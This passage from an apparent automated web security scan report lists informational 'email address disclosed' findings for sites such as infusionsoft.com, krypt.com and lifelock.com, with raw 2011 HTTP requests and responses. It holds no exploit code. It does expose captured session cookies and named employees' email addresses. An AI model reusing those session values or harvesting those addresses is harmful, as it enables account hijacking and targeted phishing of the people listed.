Content-Length: 18552

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account = "flairviewhcprod"
//var s_account = "flairviewhcprod"
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

26.66. http://www.identitymanagement.com/js/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identitymanagement.com
Path:   /js/functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/functions.js HTTP/1.1
Host: www.identitymanagement.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:02 GMT
Content-Type: application/x-javascript
Content-Location: http://www.identitymanagement.com/js/functions.js
Last-Modified: Mon, 12 Jul 2010 19:42:39 GMT
Accept-Ranges: bytes
ETag: "80219a62fa21cb1:4806"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8153

var menu_total = 17;
var blue_menu_total = 2;

function rollover(img, on)
{

   off = img.src;
   id = img.id;
   subnav = id+"_subnav";
   offfull = img.src;
   onfull = on;
   if(off.lastIndexOf('/')
...[SNIP]...
</object>');
}
function printContact()
{
   var a = document.createElement("A");
   var x = "heidi";
   var y = "@";
   var z = "groshelle.com";
   a.setAttribute("href","mailto:heidi@groshelle.com");
   a.innerHTML = x+y+z;
   document.getElementById('heidi').appendChild(a);
}

function InsertFlashMovieTest()
{
document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" co
...[SNIP]...

26.67. http://www.infusionblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<a href="mailto:abuse@infusionsoft.com">
...[SNIP]...

26.68. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=a5ec6edf213d896f3903101ca35e8f6b; expires=Wed, 18-May-2011 05:10:10 GMT; path=/; domain=.infusionsoft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:36:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:36:50 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...
<a href="mailto:abuse@infusionsoft.com">
...[SNIP]...

26.69. http://www.infusionsoft.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /about

Issue detail

The following email address was disclosed in the response:

Request

GET /about HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:25:46 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:06 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<a href="mailto:abuse@infusionsoft.com">
...[SNIP]...

26.70. http://www.infusionsoft.com/clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /clients

Issue detail

The following email address was disclosed in the response:

Request

GET /clients HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:40:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:27:08 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:40:27 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:40:29 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<a href="mailto:abuse@infusionsoft.com">
...[SNIP]...

26.71. http://www.infusionsoft.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The following email address was disclosed in the response:

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<a href="mailto:abuse@infusionsoft.com">
...[SNIP]...

26.72. http://www.infusionsoft.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /pricing

Issue detail

The following email address was disclosed in the response:

Request

GET /pricing HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:19 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:20 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 29858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<a href="mailto:abuse@infusionsoft.com">
...[SNIP]...

26.73. http://www.krypt.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /contact/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:02 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27890

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Contact
...[SNIP]...
<span>support@krypt.com</span>
...[SNIP]...
<span>abuse@krypt.com</span>
...[SNIP]...

26.74. http://www.krypt.com/js/cart.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /js/cart.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/cart.js HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://www.krypt.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.2.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:02 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/javascript
Content-Length: 12245

// $Id: cart.js 4849 2011-03-09 23:03:37Z jrlenz $

var cf_Posting = false;

function cart_Clear() {
   jConfirm("<strong>This can not be undone!</strong><br />Are you <strong>SURE</strong> you want to
...[SNIP]...
<br />Please contact sales@krypt.com to place your order.", function(r) {
                       window.location = 'http://www.krypt.com/contact/';
                   });
               } else {
                   cf_Posting = false;
               }
           }
       }
   );
}
function cart_ErrAlert(fields) {
   var
...[SNIP]...
<a href="mailto:sales@krypt.com">sales@krypt.com</a>
...[SNIP]...

26.75. http://www.lifelock.com/about/leadership/management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/leadership/management/

Issue detail

The following email address was disclosed in the response:

Request

GET /about/leadership/management/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.3.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/36

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:40 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18319

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...

26.76. http://www.lifelock.com/about/lifelock-in-the-community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/lifelock-in-the-community/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=3e9d64599ec3dc11eab7f4125fe101c63ec073d706939dfc4db392a6; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:29 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15989

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...
<a href="mailto:paige.pedersen@lifelock.com">paige.pedersen@lifelock.com</a>
...[SNIP]...
<a href="mailto:cortney.lanik@lifelock.com">cortney.lanik@lifelock.com</a>
...[SNIP]...
<a href="mailto:speakerrequest@lifelock.com">
...[SNIP]...
<a href="mailto:mailto:paige.pedersen@lifelock.com?subject=Hosting%20a%20Law%20Enforcement%20Summit">
...[SNIP]...

26.77. http://www.lifelock.com/guarantee/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /guarantee/

Issue detail

The following email address was disclosed in the response:

Request

GET /guarantee/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/54

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:54 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13369

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...

26.78. http://www.lifelock.com/how-it-works/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /how-it-works/

Issue detail

The following email address was disclosed in the response:

Request

GET /how-it-works/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
